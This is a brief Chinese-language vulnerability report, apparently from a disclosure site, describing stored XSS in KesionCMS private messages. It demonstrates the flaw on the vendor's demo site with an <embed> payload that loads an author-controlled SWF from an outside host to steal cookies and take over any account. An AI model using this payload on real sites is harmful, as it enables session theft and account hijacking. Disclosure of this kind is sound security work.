KesionCMS存储型xss漏洞可打任意用户
这里选择用KesionCMS官方体验地址http://demo.kesion.com/ 该存储型xss漏洞存在于发送消息处 这里我们用bitcoin100向另外一个用户bitcoin发送消息, 发送消息时,在内容中插入xss代码 <embed code=“/\pujun.li/xss.swf” allowscriptaccess=“always”> swf是我自己控制的,可以盗取cookies 未过滤这个代码 导致攻击任意账户
<img src=“https://images.seebug.org/upload/201406/2321415813bfc2c8e594e50932aea01b5b74ffcc.jpg” alt=“22222222.jpg” width=“600”>
<img src=“https://images.seebug.org/upload/201406/23214216f4a5b7e2968f1256b90189630cdfc86f.jpg” alt=“3333333333333333.jpg” width=“600”>
如上